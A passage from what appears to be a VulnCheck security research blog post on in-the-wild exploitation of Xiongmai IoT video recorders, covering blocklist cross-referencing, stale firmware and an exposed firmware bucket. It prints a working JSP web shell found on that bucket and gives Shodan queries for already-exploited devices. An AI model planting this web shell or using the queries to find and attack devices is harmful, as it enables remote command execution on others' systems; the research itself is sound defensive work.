login:\n",[886,117492,117490],{"__ignoreMap":219},[18,117494,117495,117496,117498],{},"This ",[886,117497,1055],{}," debug logic doesn’t appear to be available in all affected systems. Which means, as Leech indicated in his write up, exploitation of CVE-2022-26259 in the wild is going to be a little messy. Different firmware will require different exploitation methods. Attackers will need to figure out a version fingerprinting method, or just be patient as the box reboots 2 minutes after every crash.",[61,117500,117502],{"id":117501},"scale-of-xiongmai-exploitation","Scale of Xiongmai Exploitation",[18,117504,117505,117506,1246,117509,1246,117513,117517,117518,117521],{},"Although we haven’t touched on all of these, we know ",[47,117507,81767],{"href":116790,"rel":117508},[51],[47,117510,115722],{"href":117511,"rel":117512},"https:\u002F\u002Fviz.greynoise.io\u002Ftag\u002Fhisilicon-backdoor-access-attempt?days=30",[51],[47,117514,106686],{"href":117515,"rel":117516},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=port%3A9527+%2B%22%27+is+not+a+command.%22",[51],", and CVE-2022-45045 are all being actively targeted ",[1131,117519,117520],{},"right now",". We can verify that via Greynoise, Shodan, or our own honeypots. The question is, “At what scale?”",[18,117523,117524,117525,117530],{},"It’s a difficult question to answer. But we can get some ideas. In ",[47,117526,117529],{"href":117527,"rel":117528},"https:\u002F\u002Fscholar.google.com\u002Fcitations?user=I35Lgl4AAAAJ&hl=en",[51],"Troy Mursch’s",", “Identifying infected energy systems in the wild”, Troy cross referenced known malicious endpoints (from Greynoise, honeypots, and IP blocklists) against a Censys scan of ICS endpoints. The overlapping IP addresses, Mursch theorized, are infected\u002Fmalicious ICS systems. The general idea is that when these systems are recruited into a botnet, they themselves will start recruiting others and eventually end up in a malicious endpoint list.",[18,117532,117533,117534,117539],{},"We can do something similar. I grabbed the IP addresses of 200,000 Xiongmai devices from Shodan and cross referenced them against the ",[47,117535,117538],{"href":117536,"rel":117537},"https:\u002F\u002Fiplists.firehol.org\u002F",[51],"FireHOL"," blocklists (with all netblocks removed because that seemed overly broad). Now, FireHOL isn’t perfect. In fact, some of the aggregated lists are incredibly old. But some are updated daily. IP blocklists are also notorious for false positives. But the goal is not to be perfect, but to merely get an idea of how many Xiongmai endpoints are considered malicious.",[18,117541,117542],{},"The cross reference generated the following:",[1354,117544,117547],{"className":117545,"code":117546,"language":1359},[1357],"firehol_anonymous.netset: 1185\nfirehol_proxies.netset: 1185\nfirehol_level4.netset: 166\nstopforumspam_365d.ipset: 144\nblocklist_net_ua.ipset: 142\nstopforumspam_180d.ipset: 68\nfirehol_abusers_30d.netset: 57\nstopforumspam.ipset: 45\nstopforumspam_90d.ipset: 45\nhaley_ssh.ipset: 24\nsocks_proxy_30d.ipset: 22\nnixspam.ipset: 14\nvoipbl.netset: 14\nstopforumspam_30d.ipset: 13\nsocks_proxy_7d.ipset: 10\nproxylists_7d.ipset: 9\nproxylists_30d.ipset: 9\nesentire_emptyarray_ru.ipset: 9\nlashback_ubl.ipset: 8\nesentire_dorttlokolrt_com.ipset: 8\nesentire_crazyerror_su.ipset: 8\ncleantalk_30d.ipset: 7\niblocklist_ciarmy_malicious.netset: 7\nfirehol_level3.netset: 7\nesentire_maddox1_ru.ipset: 7\nsblam.ipset: 6\nciarmy.ipset: 6\nproxylists_1d.ipset: 5\nnullsecure.ipset: 5\ncleantalk_new_30d.ipset: 4\nsocks_proxy_1d.ipset: 4\ncleantalk_updated_30d.ipset: 4\nesentire_burmundisoul_ru.ipset: 4\nesentire_22072014c_com.ipset: 3\nesentire_22072014a_com.ipset: 3\nesentire_22072014b_com.ipset: 3\nproxz_30d.ipset: 3\ntaichung.ipset: 3\nesentire_volaya_ru.ipset: 3\nbitcoin_nodes_30d.ipset: 3\npacketmail_ramnode.ipset: 2\nbotscout_30d.ipset: 2\nstopforumspam_7d.ipset: 2\nnormshield_high_wannacry.ipset: 2\nnormshield_all_wannacry.ipset: 2\npacketmail.ipset: 2\ncleantalk_7d.ipset: 2\nproxyspy_30d.ipset: 2\nproxz_7d.ipset: 2\nesentire_downs1_ru.ipset: 2\nesentire_manning1_ru.ipset: 2\nbitcoin_nodes_7d.ipset: 2\nproxylists.ipset: 2\nesentire_inleet_ru.ipset: 2\nesentire_getarohirodrons_com.ipset: 2\ncruzit_web_attacks.ipset: 1\niblocklist_cruzit_web_attacks.netset: 1\ncleantalk_new_7d.ipset: 1\ncleantalk_updated_7d.ipset: 1\nproxyspy_7d.ipset: 1\nbitcoin_blockchain_info_30d.ipset: 1\ndarklist_de.netset: 1\nesentire_smartfoodsglutenfree_kz.ipset: 1\nbitcoin_nodes_1d.ipset: 1\nbitcoin_nodes.ipset: 1\ncoinbl_hosts.ipset: 1\nhphosts_emd.ipset: 1\nturris_greylist.ipset: 1\nblocklist_de_bruteforce.ipset: 1\nfirehol_level2.netset: 1\nblocklist_de_apache.ipset: 1\nblocklist_de.ipset: 1\nsslproxies_30d.ipset: 1\nesentire_fioartd_com.ipset: 1\nesentire_dagestanskiiviskis_ru.ipset: 1\nesentire_venerologvasan93_ru.ipset: 1\nesentire_hasanhashsde_ru.ipset: 1\nesentire_14072015q_com.ipset: 1\nesentire_mysebstarion_ru.ipset: 1\nesentire_ebankoalalusys_ru.ipset: 1\nesentire_14072015_com.ipset: 1\n",[886,117548,117546],{"__ignoreMap":219},[18,117550,117551,117552,117556],{},"The result is actually quite a bit lower than I had expected. That may be due to the quality of the block list, or exploited endpoints don’t actually recruit others, or the scale of exploitation is on the small side. Regardless, looking over this list did provide one interesting insight. Validating this list, I discovered ",[47,117553,74822],{"href":117554,"rel":117555},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=port%3A9001+%22%2Fvar%22+-HTTP",[51]," Shodan query:",[18,117558,117559],{},[68,117560],{":width":10862,"alt":117561,"src":117562},"exploited_port_9001","\u002Fblog\u002Fxiongmai-iot-exploitation\u002Fexploited_port_9001.png",[18,117564,117565,117566,117568,117569,117571],{},"This query shows devices that have recently been exploited by CVE-2022-45045. As we saw earlier, the attacker opens ",[886,117567,1055],{}," on port 9001 which allows them to begin their stage 2 attack. The endpoints listed on Shodan are systems where the attacker has failed to close ",[886,117570,1055],{}," to the reset of the world (or simply haven’t gotten around to it yet).",[61,117573,117575],{"id":117574},"firmware-updates","Firmware Updates",[18,117577,117578,117579,117584,117585,59],{},"IoT systems are notorious for using old firmware. However, internet-facing Xiongmai systems seem to be worse than usual. There are many internet-facing systems using firmware that was released between 2016 and 2019. I believe, in large part, this is because acquiring upgrades isn’t straightforward. For example, as mentioned a few times, I recently purchased a ",[47,117580,117583],{"href":117581,"rel":117582},"https:\u002F\u002Fsunbatech.com\u002Fproduct\u002Fnvr-f8010se\u002F",[51],"Sunba NVR-F8010SE",". The device arrived using a firmware from 2019. It has no auto-upgrade feature. The Sunba website doesn’t have a firmware file to download for the device. The NVR’s manual doesn’t mention upgrades. So, without any obvious leads, a normal user probably wouldn’t pursue upgrading the system. A normal user isn’t going to find Xiongmai’s firmware server, especially if they’re using a relabled device like Sunba. But there is a firmware download site: ",[47,117586,117587],{"href":117587,"rel":117588},"https:\u002F\u002Fbaike.jftech.com\u002Fdownload.html",[51],[18,117590,117591,117592,117597],{},"Xiongmai stores their firmware on ",[47,117593,117596],{"href":117594,"rel":117595},"https:\u002F\u002Fobs-xm-customer.obs.cn-east-2.myhuaweicloud.com\u002F",[51],"myhuaweicloud",". From this site, you can get a full directory listing of all available firmware (a vulnerability analyst dream). Interestingly, the firmware server is littered with non-firmware files.",[1354,117599,117601],{"className":56326,"code":117600,"language":56328,"meta":219,"style":219},"\u003CContents>\n \u003CKey>vuuzcu.jsp\u002F\u003C\u002FKey>\n \u003CLastModified>2021-01-30T05:23:00.929Z\u003C\u002FLastModified>\n \u003CETag>\"134155a532a368eded42290a2a28bb58\"\u003C\u002FETag>\n \u003CSize>35\u003C\u002FSize>\n \u003COwner>\n \u003CID>65a011a29cdf8ec533ec3d1ccaae921c\u003C\u002FID>\n \u003CDisplayName\u002F>\n \u003C\u002FOwner>\n \u003CStorageClass>STANDARD\u003C\u002FStorageClass>\n\u003C\u002FContents>\n\u003CContents>\n \u003CKey>wp-content\u002Fplugins\u002Fw3-total-cache\u002Fpub\u002Fsns.php\u003C\u002FKey>\n \u003CLastModified>2022-04-08T10:26:53.530Z\u003C\u002FLastModified>\n \u003CETag>\"07b9ab8f8dfa1f3f372a44da3f16cbbf\"\u003C\u002FETag>\n \u003CSize>96\u003C\u002FSize>\n \u003COwner>\n \u003CID>65a011a29cdf8ec533ec3d1ccaae921c\u003C\u002FID>\n \u003CDisplayName\u002F>\n \u003C\u002FOwner>\n \u003CStorageClass>STANDARD\u003C\u002FStorageClass>\n\u003C\u002FContents>\n\u003CContents>\n \u003CKey>wxzqqi.jsp\u002F\u003C\u002FKey>\n \u003CLastModified>2022-11-18T09:30:45.785Z\u003C\u002FLastModified>\n \u003CETag>\"9d631c65ed74752c7081301986f84fe6\"\u003C\u002FETag>\n \u003CSize>35\u003C\u002FSize>\n \u003COwner>\n \u003CID>65a011a29cdf8ec533ec3d1ccaae921c\u003C\u002FID>\n \u003CDisplayName\u002F>\n \u003C\u002FOwner>\n \u003CStorageClass>STANDARD\u003C\u002FStorageClass>\n\u003C\u002FContents>\n\u003CContents>\n",[886,117602,117603,117612,117629,117647,117665,117682,117691,117709,117718,117726,117744,117752,117760,117777,117794,117811,117827,117835,117851,117859,117867,117883,117891,117899,117916,117933,117950,117966,117974,117990,117998,118006,118022,118030],{"__ignoreMap":219},[1373,117604,117605,117607,117610],{"class":1375,"line":1376},[1373,117606,11852],{"class":1383},[1373,117608,117609],{"class":6300},"Contents",[1373,117611,6765],{"class":1383},[1373,117613,117614,117616,117618,117620,117623,117625,117627],{"class":1375,"line":220},[1373,117615,27250],{"class":1383},[1373,117617,15996],{"class":6300},[1373,117619,5384],{"class":1383},[1373,117621,117622],{"class":4640},"vuuzcu.jsp\u002F",[1373,117624,46627],{"class":1383},[1373,117626,15996],{"class":6300},[1373,117628,6765],{"class":1383},[1373,117630,117631,117633,117636,117638,117641,117643,117645],{"class":1375,"line":1266},[1373,117632,27250],{"class":1383},[1373,117634,117635],{"class":6300},"LastModified",[1373,117637,5384],{"class":1383},[1373,117639,117640],{"class":4640},"2021-01-30T05:23:00.929Z",[1373,117642,46627],{"class":1383},[1373,117644,117635],{"class":6300},[1373,117646,6765],{"class":1383},[1373,117648,117649,117651,117654,117656,117659,117661,117663],{"class":1375,"line":1852},[1373,117650,27250],{"class":1383},[1373,117652,117653],{"class":6300},"ETag",[1373,117655,5384],{"class":1383},[1373,117657,117658],{"class":4640},"\"134155a532a368eded42290a2a28bb58\"",[1373,117660,46627],{"class":1383},[1373,117662,117653],{"class":6300},[1373,117664,6765],{"class":1383},[1373,117666,117667,117669,117672,117674,117676,117678,117680],{"class":1375,"line":4692},[1373,117668,27250],{"class":1383},[1373,117670,117671],{"class":6300},"Size",[1373,117673,5384],{"class":1383},[1373,117675,68450],{"class":4640},[1373,117677,46627],{"class":1383},[1373,117679,117671],{"class":6300},[1373,117681,6765],{"class":1383},[1373,117683,117684,117686,117689],{"class":1375,"line":4724},[1373,117685,27250],{"class":1383},[1373,117687,117688],{"class":6300},"Owner",[1373,117690,6765],{"class":1383},[1373,117692,117693,117695,117698,117700,117703,117705,117707],{"class":1375,"line":4756},[1373,117694,48971],{"class":1383},[1373,117696,117697],{"class":6300},"ID",[1373,117699,5384],{"class":1383},[1373,117701,117702],{"class":4640},"65a011a29cdf8ec533ec3d1ccaae921c",[1373,117704,46627],{"class":1383},[1373,117706,117697],{"class":6300},[1373,117708,6765],{"class":1383},[1373,117710,117711,117713,117716],{"class":1375,"line":4768},[1373,117712,48971],{"class":1383},[1373,117714,117715],{"class":6300},"DisplayName",[1373,117717,85355],{"class":1383},[1373,117719,117720,117722,117724],{"class":1375,"line":4792},[1373,117721,49129],{"class":1383},[1373,117723,117688],{"class":6300},[1373,117725,6765],{"class":1383},[1373,117727,117728,117730,117733,117735,117738,117740,117742],{"class":1375,"line":4798},[1373,117729,27250],{"class":1383},[1373,117731,117732],{"class":6300},"StorageClass",[1373,117734,5384],{"class":1383},[1373,117736,117737],{"class":4640},"STANDARD",[1373,117739,46627],{"class":1383},[1373,117741,117732],{"class":6300},[1373,117743,6765],{"class":1383},[1373,117745,117746,117748,117750],{"class":1375,"line":4806},[1373,117747,46627],{"class":1383},[1373,117749,117609],{"class":6300},[1373,117751,6765],{"class":1383},[1373,117753,117754,117756,117758],{"class":1375,"line":4817},[1373,117755,11852],{"class":1383},[1373,117757,117609],{"class":6300},[1373,117759,6765],{"class":1383},[1373,117761,117762,117764,117766,117768,117771,117773,117775],{"class":1375,"line":4825},[1373,117763,27250],{"class":1383},[1373,117765,15996],{"class":6300},[1373,117767,5384],{"class":1383},[1373,117769,117770],{"class":4640},"wp-content\u002Fplugins\u002Fw3-total-cache\u002Fpub\u002Fsns.php",[1373,117772,46627],{"class":1383},[1373,117774,15996],{"class":6300},[1373,117776,6765],{"class":1383},[1373,117778,117779,117781,117783,117785,117788,117790,117792],{"class":1375,"line":4835},[1373,117780,27250],{"class":1383},[1373,117782,117635],{"class":6300},[1373,117784,5384],{"class":1383},[1373,117786,117787],{"class":4640},"2022-04-08T10:26:53.530Z",[1373,117789,46627],{"class":1383},[1373,117791,117635],{"class":6300},[1373,117793,6765],{"class":1383},[1373,117795,117796,117798,117800,117802,117805,117807,117809],{"class":1375,"line":4843},[1373,117797,27250],{"class":1383},[1373,117799,117653],{"class":6300},[1373,117801,5384],{"class":1383},[1373,117803,117804],{"class":4640},"\"07b9ab8f8dfa1f3f372a44da3f16cbbf\"",[1373,117806,46627],{"class":1383},[1373,117808,117653],{"class":6300},[1373,117810,6765],{"class":1383},[1373,117812,117813,117815,117817,117819,117821,117823,117825],{"class":1375,"line":4849},[1373,117814,27250],{"class":1383},[1373,117816,117671],{"class":6300},[1373,117818,5384],{"class":1383},[1373,117820,58805],{"class":4640},[1373,117822,46627],{"class":1383},[1373,117824,117671],{"class":6300},[1373,117826,6765],{"class":1383},[1373,117828,117829,117831,117833],{"class":1375,"line":4877},[1373,117830,27250],{"class":1383},[1373,117832,117688],{"class":6300},[1373,117834,6765],{"class":1383},[1373,117836,117837,117839,117841,117843,117845,117847,117849],{"class":1375,"line":4915},[1373,117838,48971],{"class":1383},[1373,117840,117697],{"class":6300},[1373,117842,5384],{"class":1383},[1373,117844,117702],{"class":4640},[1373,117846,46627],{"class":1383},[1373,117848,117697],{"class":6300},[1373,117850,6765],{"class":1383},[1373,117852,117853,117855,117857],{"class":1375,"line":4931},[1373,117854,48971],{"class":1383},[1373,117856,117715],{"class":6300},[1373,117858,85355],{"class":1383},[1373,117860,117861,117863,117865],{"class":1375,"line":4947},[1373,117862,49129],{"class":1383},[1373,117864,117688],{"class":6300},[1373,117866,6765],{"class":1383},[1373,117868,117869,117871,117873,117875,117877,117879,117881],{"class":1375,"line":4952},[1373,117870,27250],{"class":1383},[1373,117872,117732],{"class":6300},[1373,117874,5384],{"class":1383},[1373,117876,117737],{"class":4640},[1373,117878,46627],{"class":1383},[1373,117880,117732],{"class":6300},[1373,117882,6765],{"class":1383},[1373,117884,117885,117887,117889],{"class":1375,"line":6776},[1373,117886,46627],{"class":1383},[1373,117888,117609],{"class":6300},[1373,117890,6765],{"class":1383},[1373,117892,117893,117895,117897],{"class":1375,"line":6781},[1373,117894,11852],{"class":1383},[1373,117896,117609],{"class":6300},[1373,117898,6765],{"class":1383},[1373,117900,117901,117903,117905,117907,117910,117912,117914],{"class":1375,"line":7524},[1373,117902,27250],{"class":1383},[1373,117904,15996],{"class":6300},[1373,117906,5384],{"class":1383},[1373,117908,117909],{"class":4640},"wxzqqi.jsp\u002F",[1373,117911,46627],{"class":1383},[1373,117913,15996],{"class":6300},[1373,117915,6765],{"class":1383},[1373,117917,117918,117920,117922,117924,117927,117929,117931],{"class":1375,"line":7530},[1373,117919,27250],{"class":1383},[1373,117921,117635],{"class":6300},[1373,117923,5384],{"class":1383},[1373,117925,117926],{"class":4640},"2022-11-18T09:30:45.785Z",[1373,117928,46627],{"class":1383},[1373,117930,117635],{"class":6300},[1373,117932,6765],{"class":1383},[1373,117934,117935,117937,117939,117941,117944,117946,117948],{"class":1375,"line":7546},[1373,117936,27250],{"class":1383},[1373,117938,117653],{"class":6300},[1373,117940,5384],{"class":1383},[1373,117942,117943],{"class":4640},"\"9d631c65ed74752c7081301986f84fe6\"",[1373,117945,46627],{"class":1383},[1373,117947,117653],{"class":6300},[1373,117949,6765],{"class":1383},[1373,117951,117952,117954,117956,117958,117960,117962,117964],{"class":1375,"line":7571},[1373,117953,27250],{"class":1383},[1373,117955,117671],{"class":6300},[1373,117957,5384],{"class":1383},[1373,117959,68450],{"class":4640},[1373,117961,46627],{"class":1383},[1373,117963,117671],{"class":6300},[1373,117965,6765],{"class":1383},[1373,117967,117968,117970,117972],{"class":1375,"line":7598},[1373,117969,27250],{"class":1383},[1373,117971,117688],{"class":6300},[1373,117973,6765],{"class":1383},[1373,117975,117976,117978,117980,117982,117984,117986,117988],{"class":1375,"line":7615},[1373,117977,48971],{"class":1383},[1373,117979,117697],{"class":6300},[1373,117981,5384],{"class":1383},[1373,117983,117702],{"class":4640},[1373,117985,46627],{"class":1383},[1373,117987,117697],{"class":6300},[1373,117989,6765],{"class":1383},[1373,117991,117992,117994,117996],{"class":1375,"line":7635},[1373,117993,48971],{"class":1383},[1373,117995,117715],{"class":6300},[1373,117997,85355],{"class":1383},[1373,117999,118000,118002,118004],{"class":1375,"line":7640},[1373,118001,49129],{"class":1383},[1373,118003,117688],{"class":6300},[1373,118005,6765],{"class":1383},[1373,118007,118008,118010,118012,118014,118016,118018,118020],{"class":1375,"line":7648},[1373,118009,27250],{"class":1383},[1373,118011,117732],{"class":6300},[1373,118013,5384],{"class":1383},[1373,118015,117737],{"class":4640},[1373,118017,46627],{"class":1383},[1373,118019,117732],{"class":6300},[1373,118021,6765],{"class":1383},[1373,118023,118024,118026,118028],{"class":1375,"line":7672},[1373,118025,46627],{"class":1383},[1373,118027,117609],{"class":6300},[1373,118029,6765],{"class":1383},[1373,118031,118032,118034,118036],{"class":1375,"line":7688},[1373,118033,11852],{"class":1383},[1373,118035,117609],{"class":6300},[1373,118037,6765],{"class":1383},[18,118039,118040,118041,982,118044,118047,118048,118050],{},"Naturally, I was interested in what these files were. It’s a bit odd to find ",[886,118042,118043],{},".php",[886,118045,118046],{},".jsp"," files listed amongst the normal firmware ",[886,118049,94544],{},". Examining the file, some appear to be the result of a Nessus scan.",[1354,118052,118055],{"className":118053,"code":118054,"language":1359},[1357],"curl https:\u002F\u002Fobs-xm-customer.obs.cn-east-2.myhuaweicloud.com\u002Fwp-content\u002Fplugins\u002Fw3-total-cache\u002Fpub\u002Fsns.php\n{\"Type\":\"SubscriptionConfirmation\",\"Message\":\"\",\"SubscribeURL\":\"https:\u002F\u002Frfi.nessus.org\u002Frfi.txt\"}\n",[886,118056,118054],{"__ignoreMap":219},[18,118058,118059],{},"Others appear to be broken web shells.",[18,118061,118062],{},[886,118063,118064],{},"curl https:\u002F\u002Fobs-xm-customer.obs.cn-east-2.myhuaweicloud.com\u002Fpoc.jsp\u002F",[1354,118066,118068],{"className":27194,"code":118067,"language":27196,"meta":219,"style":219},"\n\u003C%@ page import=\"java.util.*,java.io.*\"%>\n\u003C%\nif (request.getParameter(\"cmd\") == null) { return }\nout.println(\"Command: \" + request.getParameter(\"cmd\") + \"\u003CBR>\");\nProcess p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\nOutputStream os = p.getOutputStream();\nInputStream in = p.getInputStream();\nDataInputStream dis = new DataInputStream(in);\nString disr = dis.readLine();\nwhile ( disr != null ) {\n out.println(disr);\n disr = dis.readLine();\n }\n}\n\n%>\n",[886,118069,118070,118074,118098,118102,118136,118182,118218,118235,118252,118270,118286,118304,118319,118334,118338,118342,118346],{"__ignoreMap":219},[1373,118071,118072],{"class":1375,"line":1376},[1373,118073,6520],{"emptyLinePlaceholder":237},[1373,118075,118076,118079,118081,118084,118086,118088,118090,118093,118095],{"class":1375,"line":220},[1373,118077,118078],{"class":1397},"\u003C%",[1373,118080,7318],{"class":1383},[1373,118082,118083],{"class":7293}," page",[1373,118085,102527],{"class":4640},[1373,118087,5417],{"class":1397},[1373,118089,183],{"class":1387},[1373,118091,118092],{"class":1391},"java.util.*,java.io.*",[1373,118094,183],{"class":1387},[1373,118096,118097],{"class":1397},"%>\n",[1373,118099,118100],{"class":1375,"line":1266},[1373,118101,91287],{"class":1397},[1373,118103,118104,118106,118108,118110,118112,118114,118116,118118,118120,118122,118124,118126,118128,118130,118132,118134],{"class":1375,"line":1852},[1373,118105,4637],{"class":4636},[1373,118107,4641],{"class":1383},[1373,118109,75186],{"class":4640},[1373,118111,59],{"class":1383},[1373,118113,75130],{"class":7297},[1373,118115,1384],{"class":1383},[1373,118117,183],{"class":1387},[1373,118119,17653],{"class":1391},[1373,118121,183],{"class":1387},[1373,118123,2230],{"class":1383},[1373,118125,16406],{"class":1397},[1373,118127,15680],{"class":7054},[1373,118129,2230],{"class":1383},[1373,118131,5420],{"class":1383},[1373,118133,94321],{"class":4636},[1373,118135,35334],{"class":1383},[1373,118137,118138,118140,118142,118144,118146,118148,118151,118153,118155,118157,118159,118161,118163,118165,118167,118169,118171,118173,118175,118178,118180],{"class":1375,"line":4692},[1373,118139,110008],{"class":4640},[1373,118141,59],{"class":1383},[1373,118143,82527],{"class":7297},[1373,118145,1384],{"class":1383},[1373,118147,183],{"class":1387},[1373,118149,118150],{"class":1391},"Command: ",[1373,118152,183],{"class":1387},[1373,118154,15478],{"class":1397},[1373,118156,75125],{"class":4640},[1373,118158,59],{"class":1383},[1373,118160,75130],{"class":7297},[1373,118162,1384],{"class":1383},[1373,118164,183],{"class":1387},[1373,118166,17653],{"class":1391},[1373,118168,183],{"class":1387},[1373,118170,2230],{"class":1383},[1373,118172,15478],{"class":1397},[1373,118174,4883],{"class":1387},[1373,118176,118177],{"class":1391},"\u003CBR>",[1373,118179,183],{"class":1387},[1373,118181,4680],{"class":1383},[1373,118183,118184,118186,118188,118190,118192,118194,118196,118198,118200,118202,118204,118206,118208,118210,118212,118214,118216],{"class":1375,"line":4724},[1373,118185,17590],{"class":27228},[1373,118187,27886],{"class":4640},[1373,118189,5417],{"class":1397},[1373,118191,27891],{"class":4640},[1373,118193,59],{"class":1383},[1373,118195,27896],{"class":7297},[1373,118197,16355],{"class":1383},[1373,118199,27901],{"class":7297},[1373,118201,1384],{"class":1383},[1373,118203,75186],{"class":4640},[1373,118205,59],{"class":1383},[1373,118207,75130],{"class":7297},[1373,118209,1384],{"class":1383},[1373,118211,183],{"class":1387},[1373,118213,17653],{"class":1391},[1373,118215,183],{"class":1387},[1373,118217,1413],{"class":1383},[1373,118219,118220,118223,118225,118227,118229,118231,118233],{"class":1375,"line":4756},[1373,118221,118222],{"class":27228},"OutputStream",[1373,118224,75257],{"class":4640},[1373,118226,5417],{"class":1397},[1373,118228,75262],{"class":4640},[1373,118230,59],{"class":1383},[1373,118232,75267],{"class":7297},[1373,118234,15603],{"class":1383},[1373,118236,118237,118240,118242,118244,118246,118248,118250],{"class":1375,"line":4768},[1373,118238,118239],{"class":27228},"InputStream",[1373,118241,50864],{"class":4640},[1373,118243,5417],{"class":1397},[1373,118245,75262],{"class":4640},[1373,118247,59],{"class":1383},[1373,118249,75285],{"class":7297},[1373,118251,15603],{"class":1383},[1373,118253,118254,118256,118258,118260,118262,118264,118266,118268],{"class":1375,"line":4792},[1373,118255,91342],{"class":27228},[1373,118257,75295],{"class":4640},[1373,118259,5417],{"class":1397},[1373,118261,15283],{"class":4636},[1373,118263,75302],{"class":7297},[1373,118265,1384],{"class":1383},[1373,118267,63776],{"class":4640},[1373,118269,4680],{"class":1383},[1373,118271,118272,118274,118276,118278,118280,118282,118284],{"class":1375,"line":4798},[1373,118273,27524],{"class":27228},[1373,118275,75315],{"class":4640},[1373,118277,5417],{"class":1397},[1373,118279,75320],{"class":4640},[1373,118281,59],{"class":1383},[1373,118283,75325],{"class":7297},[1373,118285,15603],{"class":1383},[1373,118287,118288,118291,118293,118295,118297,118299,118302],{"class":1375,"line":4806},[1373,118289,118290],{"class":4636},"while",[1373,118292,4641],{"class":1383},[1373,118294,75315],{"class":4640},[1373,118296,15677],{"class":1397},[1373,118298,15680],{"class":7054},[1373,118300,118301],{"class":1383}," )",[1373,118303,4765],{"class":1383},[1373,118305,118306,118309,118311,118313,118315,118317],{"class":1375,"line":4817},[1373,118307,118308],{"class":4640}," out",[1373,118310,59],{"class":1383},[1373,118312,82527],{"class":7297},[1373,118314,1384],{"class":1383},[1373,118316,75360],{"class":4640},[1373,118318,4680],{"class":1383},[1373,118320,118321,118324,118326,118328,118330,118332],{"class":1375,"line":4825},[1373,118322,118323],{"class":4640}," disr ",[1373,118325,5417],{"class":1397},[1373,118327,75320],{"class":4640},[1373,118329,59],{"class":1383},[1373,118331,75325],{"class":7297},[1373,118333,15603],{"class":1383},[1373,118335,118336],{"class":1375,"line":4835},[1373,118337,27147],{"class":1383},[1373,118339,118340],{"class":1375,"line":4843},[1373,118341,1855],{"class":4640},[1373,118343,118344],{"class":1375,"line":4849},[1373,118345,6520],{"emptyLinePlaceholder":237},[1373,118347,118348],{"class":1375,"line":4877},[1373,118349,118097],{"class":1397},[18,118351,118352,118353,118356],{},"Neither of which inspire confidence. One “fun” fact about the firmware for these devices is that they lack a digital signature that covers the entire firmware. It’s fairly trivial to introduce malicious content to a “valid” firmware. If an attacker can upload webshells to this firmware server, can they upload malicious firmware? ",[1131,118354,118355],{},"I’ve seen no evidence of this",", and it could be that we’re seeing the results of an authorized Nessus scan. But, like I said, the state of the firmware server doesn’t inspire confidence.",[61,118358,118360],{"id":118359},"conclusion-and-about-vulncheck","Conclusion and About VulnCheck",[18,118362,118363],{},"You might not find Xiongmai vulnerabilities on the CISA Known Exploited Vulnerabilities Catalog, and it might be hard to track down high quality public exploits for some of these vulnerabilities. But they are being exploited in the wild. And with a couple hundred thousand systems internet-facing systems, Xiongmai products are of clear value to any attacker, whether that be a botnet or someone looking to pivot inward.",[18,118365,118366],{},"VulnCheck conducted this research as part of our interest in Initial Access vulnerabilities. VulnCheck has developed proof of concept scanners and exploits, generated PCAPs, and created Suricata rules for all of the mentioned Xiongmai vulnerabilities for our Initial Access Intelligence customers.",[2901,118368,118369],{},"html pre.shiki code .ss7Ak, html code.shiki .ss7Ak{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#6A737D;--shiki-default-font-style:inherit;--shiki-dark:#6A737D;--shiki-dark-font-style:inherit;--shiki-sepia:#88846F;--shiki-sepia-font-style:inherit}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sMLJd, html code.shiki .sMLJd{--shiki-light:#6182B8;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#66D9EF}html pre.shiki code .sQeA1, html code.shiki .sQeA1{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sAZ-3, html code.shiki .sAZ-3{--shiki-light:#6182B8;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .squCx, html code.shiki .squCx{--shiki-light:#E53935;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sYoWi, html code.shiki .sYoWi{--shiki-light:#E53935;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span 